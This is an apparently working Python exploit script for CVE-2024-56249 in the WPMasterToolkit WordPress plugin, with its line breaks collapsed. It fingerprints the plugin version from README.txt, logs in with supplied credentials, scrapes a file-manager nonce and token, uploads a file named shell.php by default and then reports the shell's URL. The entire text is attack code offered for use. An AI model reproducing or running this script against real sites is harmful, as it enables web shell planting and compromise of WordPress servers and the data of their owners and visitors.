import requests import re from bs4 import BeautifulSoup import argparse import os from urllib.parse import urlparse # Exploit script by Nxploit | Khaled Alenazi requests.packages.urllib3.disable_warnings() def probe_vulnerability(target_url): readme_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/README.txt" try: response = requests.get(readme_url, verify=False, timeout=10) if response.status_code == 200: match = re.search(r'Stable tag:\s*([\d.]+)', response.text) if match: version = match.group(1) print(f"[🔍] Detected plugin version: {version}") if float(version.replace(".", "")) <= 1131: print("[đŸ”Ĩ] Target is VULNERABLE to CVE-2024-56249! Exploiting...") return True else: print("[❌] Target is NOT vulnerable. (Version is newer than 1.13.1).") return False else: print("[⚠ī¸] Could not determine plugin version.") return False else: print("[❌] README file not found. Cannot verify the vulnerability.") return False except requests.RequestException as e: print(f"[❌] Error while probing vulnerability: {e}") return False def breach_wp_login(session, login_url, username, password, headers): print("[🔑] Attempting to log in...") login_data = { "log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In" } try: response = session.post(login_url, data=login_data, headers=headers, timeout=10) if any("wordpress_logged_in" in cookie.name for cookie in session.cookies): print("[✅] Authentication successful!") return True else: print("[❌] Authentication failed! Check credentials.") return False except requests.RequestException as e: print(f"[❌] Error during authentication: {e}") return False def extract_exploit_tokens(session, exploit_url, headers): print("[📡] Extracting security tokens...") try: response = session.get(exploit_url, headers=headers, timeout=10) nonce_match = re.search(r'WPMastertoolkit_FileManager\s*=\s*\{.*?"nonce":"([a-zA-Z0-9]+)".*?\}', response.text) token_match = re.search(r'name="token"\s*value="([a-zA-Z0-9]+)"', response.text) if nonce_match and token_match: nonce_value = nonce_match.group(1) token_value = token_match.group(1) print(f"[✅] Extracted nonce: {nonce_value}") print(f"[✅] Extracted token: {token_value}") return nonce_value, token_value else: print("[❌] Failed to retrieve nonce or token!") return None, None except requests.RequestException as e: print(f"[❌] Error extracting security tokens: {e}") return None, None def deploy_payload(session, upload_url, file_path, file_name, nonce, token, headers): print(f"[📤] Attempting to upload {file_name} to {file_path}...") files = { "file": (file_name, open(file_name, "rb"), "text/plain") } payload_data = { "p": file_path, "fullpath": file_path, "token": token, "nonce": nonce } try: response = session.post(upload_url, headers=headers, files=files, data=payload_data, timeout=10) if response.status_code == 200: print("[✅] Upload request sent successfully.") return True else: print(f"[❌] Upload failed! Server response: {response.text}") return False except requests.RequestException as e: print(f"[❌] Error during payload upload: {e}") return False def check_file_uploaded(file_check_url): response = requests.get(file_check_url) if response.status_code == 200: print(f"[đŸ”Ĩ] Shell uploaded successfully! URL: {file_check_url}") print("[ℹī¸] File content:\n") print(response.text) else: print("[❌] File not found in upload folder, despite HTTP 200 response.") return response.status_code == 200 if __name__ == "__main__": parser = argparse.ArgumentParser(description=" Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi") parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)") parser.add_argument("-un", "--username", required=True, help="WordPress admin username") parser.add_argument("-p", "--password", required=True, help="WordPress admin password") parser.add_argument("-fp", "--filepath", default="wp-content/uploads/2025/03", help="File upload path (default: wp-content/uploads/2025/03)") parser.add_argument("-fn", "--filename", default="shell.php", help="File name to upload (default: shell.php)") args = parser.parse_args() parsed_url = urlparse(args.url) wordpress_folder = parsed_url.path.strip("/").split("/")[0] if parsed_url.path.strip("/") else "wordpress" wordpress_url = args.url.strip().rstrip("/") if not probe_vulnerability(wordpress_url): exit() session = requests.Session() session.verify = False headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"} login_url = f"{wordpress_url}/wp-login.php" exploit_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}" upload_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}" if not breach_wp_login(session, login_url, args.username.strip(), args.password.strip(), headers): exit() nonce, token = extract_exploit_tokens(session, exploit_url, headers) if not nonce or not token: exit() if deploy_payload(session, upload_url, args.filepath.strip(), args.filename.strip(), nonce, token, headers): shell_url = f"{wordpress_url}/{args.filepath.strip()}/{args.filename.strip()}" print(f"[đŸ”Ĩ] Shell successfully uploaded! Access it here: {shell_url}") check_file_uploaded(shell_url)